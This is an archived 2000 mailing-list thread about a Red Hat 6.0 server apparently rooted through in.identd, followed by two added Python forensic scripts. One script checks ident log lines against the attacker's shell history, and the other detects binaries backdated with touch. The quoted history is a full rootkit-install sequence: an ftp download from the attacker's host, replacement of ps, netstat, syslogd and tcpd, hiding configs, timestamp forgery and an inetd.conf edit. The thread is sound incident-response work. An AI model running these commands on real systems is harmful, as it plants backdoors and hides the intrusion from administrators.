Security Incidents mailing list archives

Re: Rooted through in.identd on Red Hat 6.0


From: jburdge () AVENTAIL COM (Jon Burdge)
Date: Thu, 20 Apr 2000 09:34:39 -0700


Those requests appear to be the site he ftp'd to (ftp 200.192.58.201 21)
requesting the ident of who he was connecting as.  It looks more like it was
just the ftp daemon on the remote site behaving appropriately.

-----Original Message-----
From: Del Elson [mailto:del () BABEL COM AU]
Sent: Tuesday, April 18, 2000 10:02 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: Rooted through in.identd on Red Hat 6.0


Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del

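The point Jon makes about the identd lines can be checked mechanically. In the identd log format quoted above, "for: A, B" is the RFC 1413 request pair: A is the port on the host running identd (here "home"), B is the port on the host that sent the query. A query of "1176, 21" from 200.192.58.201 therefore asks who owned the connection from home:1176 to 200.192.58.201:21, which is exactly the outbound "ftp 200.192.58.201 21" in the shell history. The following triage script is an added example (not part of the original post or of any identd release): it parses the quoted log and history, reconstructs the request the remote FTP server sent to port 113, and flags only lookups the history does not explain. The third log line (192.0.2.7, port 6667) is constructed for the example and does not appear on the page.

```python
import re
from dataclasses import dataclass

# Constructed input: the identd lines quoted in the post, plus one extra line
# (the 192.0.2.7 / port 6667 query) that is NOT from the original and is here
# only to show a lookup the shell history does not explain.
IDENTD_LOG = """\
Apr  8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr  8 23:21:40 home identd[12031]: from: 192.0.2.7 ( 192.0.2.7 ) for: 1203, 6667
"""

# Constructed input: the first lines of the quoted .bash_history.
BASH_HISTORY = """\
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
"""

# "for: A, B" is the RFC 1413 request pair: A is the port on the host running
# identd ("home"), B is the port on the host that sent the query.
QUERY_RE = re.compile(
    r"identd\[(?P<pid>\d+)\]: from: (?P<querier>[\d.]+) \( [\d.]+ \) "
    r"for: (?P<local_port>\d+), (?P<remote_port>\d+)"
)
FTP_RE = re.compile(r"^ftp\s+(?P<host>\S+)(?:\s+(?P<port>\d+))?\s*$")


@dataclass(frozen=True)
class IdentQuery:
    pid: int
    querier: str
    local_port: int   # port on our host (the one running identd)
    remote_port: int  # port on the querying host


def parse_identd(log: str) -> list[IdentQuery]:
    """Extract the query pairs; 'Connection from' lines carry no pair and are skipped."""
    found = []
    for line in log.splitlines():
        m = QUERY_RE.search(line)
        if m:
            found.append(IdentQuery(int(m["pid"]), m["querier"],
                                    int(m["local_port"]), int(m["remote_port"])))
    return found


def outbound_ftp_targets(history: str) -> set[tuple[str, int]]:
    """(host, port) pairs for every 'ftp HOST [PORT]' line in the shell history."""
    targets = set()
    for line in history.splitlines():
        m = FTP_RE.match(line.strip())
        if m:
            targets.add((m["host"], int(m["port"] or 21)))
    return targets


def rfc1413_request(q: IdentQuery) -> str:
    """The exact request the querier sent to our port 113 to produce this log line."""
    return f"{q.local_port}, {q.remote_port}\r\n"


def classify(q: IdentQuery, targets: set[tuple[str, int]]) -> str:
    # The querier is asking "who on your side owns the connection from your
    # port local_port to my port remote_port?".  If the shell history shows us
    # connecting to querier:remote_port, this is the remote service doing an
    # ordinary ident lookup on our outbound session, not traffic aimed at identd.
    if (q.querier, q.remote_port) in targets:
        return "explained-by-outbound-ftp"
    return "unexplained"


def triage(log: str, history: str) -> list[tuple[int, str]]:
    """Per-PID verdict for every identd query in the log."""
    targets = outbound_ftp_targets(history)
    return [(q.pid, classify(q, targets)) for q in parse_identd(log)]


if __name__ == "__main__":
    for pid, verdict in triage(IDENTD_LOG, BASH_HISTORY):
        print(pid, verdict)
```

Both queries from 200.192.58.201 come out as explained, so these log lines are evidence of the attacker's download, not of the entry vector; whatever got the attacker in first has to be looked for elsewhere (the history has no timestamps, so the earlier period in messages and wtmp/utmp is the next place to look). An "unexplained" verdict only means the history does not account for it; it is not itself evidence of an exploit.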


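The "partial cover of tracks" in the history is partial for a specific reason: `touch -t` sets atime and mtime, but on a POSIX filesystem the kernel stamps ctime with the current clock on every inode change, and touch cannot override it. A responder can therefore find the replaced ps, netstat, syslogd, tcpd and pstree by looking for binaries whose ctime is far newer than their mtime, and for clusters of unrelated system binaries that share one second-precise mtime. The script below is an added example (not from the post or from any rootkit-detection tool): it builds a constructed set of six files in a temporary directory, backdates five of them with the same os.utime() call that `touch -t 199910122110` makes, and runs both checks. It assumes Linux/BSD ctime semantics; on Windows st_ctime is a creation time and the first check does not apply.

```python
import os
import tempfile
from collections import defaultdict
from datetime import datetime

# The value used in the quoted history: touch -t 199910122110 (12 Oct 1999, 21:10, local time).
BACKDATE = datetime(1999, 10, 12, 21, 10).timestamp()


def backdate_like_touch(path: str) -> None:
    """Equivalent of `touch -t 199910122110 path`: sets atime and mtime only.
    The kernel still records the current time as ctime, which touch cannot override."""
    os.utime(path, (BACKDATE, BACKDATE))


def ctime_after_mtime(paths, gap_seconds: int = 3600):
    """Files whose inode change time is much later than their claimed modification time."""
    hits = []
    for p in paths:
        st = os.stat(p)
        if st.st_ctime - st.st_mtime > gap_seconds:
            hits.append(p)
    return hits


def identical_mtime_clusters(paths, min_size: int = 3):
    """Groups of files sharing one exact mtime; a normal package install rarely
    leaves ps, netstat and syslogd with the same second-precise timestamp."""
    groups = defaultdict(list)
    for p in paths:
        groups[int(os.stat(p).st_mtime)].append(p)
    return {t: ps for t, ps in groups.items() if len(ps) >= min_size}


def demo():
    """Constructed scenario: six 'binaries', five replaced and backdated as in the history.
    'login' stands in for an untouched binary and should not be flagged."""
    tmp = tempfile.mkdtemp()
    names = ["ps", "netstat", "syslogd", "tcpd", "pstree", "login"]
    paths = {}
    for n in names:
        p = os.path.join(tmp, n)
        with open(p, "wb") as f:
            f.write(b"#!/bin/sh\nexit 0\n")   # placeholder content, not a real binary
        paths[n] = p
    for n in names[:5]:
        backdate_like_touch(paths[n])
    all_paths = list(paths.values())
    flagged = sorted(os.path.basename(p) for p in ctime_after_mtime(all_paths))
    clusters = identical_mtime_clusters(all_paths)
    return {"flagged": flagged, "cluster_sizes": sorted(len(v) for v in clusters.values())}


if __name__ == "__main__":
    print(demo())
```

On a real host, run the same two checks over /bin, /sbin, /usr/bin, /usr/sbin and /usr/lib and compare hits against the package database (rpm -V on Red Hat) from known-good media, since the trojaned ps and netstat on the box itself cannot be trusted to report anything. The ctime check is not absolute: an attacker with root can reset the system clock before the install or edit the inode directly, so treat a clean result as absence of this particular sloppiness, not as proof of integrity.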